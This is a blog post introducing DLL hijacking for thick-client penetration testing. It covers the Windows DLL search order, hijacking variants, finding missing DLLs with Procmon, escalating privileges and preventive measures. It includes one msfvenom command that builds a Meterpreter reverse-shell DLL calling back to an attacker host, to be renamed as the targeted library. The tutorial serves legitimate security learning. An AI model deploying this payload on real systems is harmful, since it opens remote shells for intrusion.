TCAPT: DLL Hijacking

6 min readNov 24, 2021

--

Hello Hackmates, I’ve been learning about Thick Client Application Penetration Testing and recently, came up with the topic: DLL Hijacking. I’ve added all References while studying about this topic.So, let’s BEGIN.

What is a DLL?

A DLL is a library that contains code and data that can be used by more than one program at the same time. A DLL contains functions, classes, variables, UIs and resources (such as icons, images, files, etc.) that an EXE, or other DLL uses. DLLs are so much like an EXE that the file format itself is the same. Both EXE and DLLs are based on the Portable Executable (PE) file format.

Loading a DLL

A program loads a DLL at startup, via the Win32 API LoadLibrary, or when it is a dependency of another DLL. A program uses the GetProcAddress to load a function or LoadResource to load a resource.

GetProcAddress Function: Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).

LoadResource Funtion: Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

How do you open a DLL file?

DLL files aren’t opened in the same way the majority of filetypes are opened. DLL files are usually called upon by an application. To view the code inside a DLL file you would have to decompile it with a third-party application like Dumpbin, dotPeek.

How do you install a DLL file?

DLL files aren’t installed like other filetypes. DLL files can be ‘installed’ by placing them in the directory where an application is set to look for a certain DLL file.

Now, let’s start with our topic: DLL Hijacking

DLL hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. In other words, DLL hijacking is a method of injecting malicious code into an application by exploiting the way some Windows applications search and load Dynamic Link Libraries (DLL).

It should be noted that when an application needs to load a DLL it will go through the following order:

The directory from which the application is loaded
C:\Windows\System32
C:\Windows\System
C:\Windows
The current working directory
Directories in the system PATH environment variable
Directories in the user PATH environment variable

Approaches for DLL Hijacking:

DLL Replacement: replace a legitimate DLL with an evil DLL. This can be combined with DLL Proxying, which ensures all functionality of the original DLL remains intact.
DLL Search Order Hijacking: DLLs specified by an application without a path are searched for in fixed locations in a specific order. Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL. This sometimes includes the working directory of the target application. [Ref.]
Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.
DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local files to include the folder containing the evil DLL. [Ref.]
WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading. [Ref.]
Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.

Testing Approach for DLL Hijacking:

Find vulnerable DLLs using Procmon.

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.

To enumerate missing DLLs inside an specific executable, set another filter like: “Process Name” “contains” “<executable-name>”. Apply it and capture events for that specific Executable.

Exploiting Missing DLLs

In order to escalate privileges, the best case scenario we have is to be able to write a DLL that a privileged process will try to load in places where it is searched. Therefore, we’ll be able to write a DLL to a folder which is of more priority for search than the folder where the Original DLL is present. Another case can be like: To write on some folder where DLL is going to be searched and that DLL doesn’t exist.

Escalating Privileges

Find process that runs with other privileges that is missing a DLL.
Have write permission on any folder where DLL is going to be searched.

Generating Malicious DLL using Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter-shell.dll

This will generate a Malicious DLL named evil-meterpreter-shell.dll. You can RENAME it with the targeted DLL name and check if you’re able to get a meterpreter shell.

How to prevent DLL Hijacking?

It is recommend enabling SafeDllSearchMode to prevent attackers from exploiting the search path.
It is also recommended to ensure that only signed DLLs are loaded for most systems process and applications.
In order to avoid DLL Hijacking, it is best to write secure code for loading DLL from specified path only.

BONUS TIP:

You can check your permissions in a folder by executing the following command:

icacls “Path-To-Dir”
The iCACLS command allows displaying or changing Access Control Lists (ACLs) for files and folders on the file system. The predecessor of the iCACLS.EXE utility is the CACLS.EXE command (which was used in Windows XP).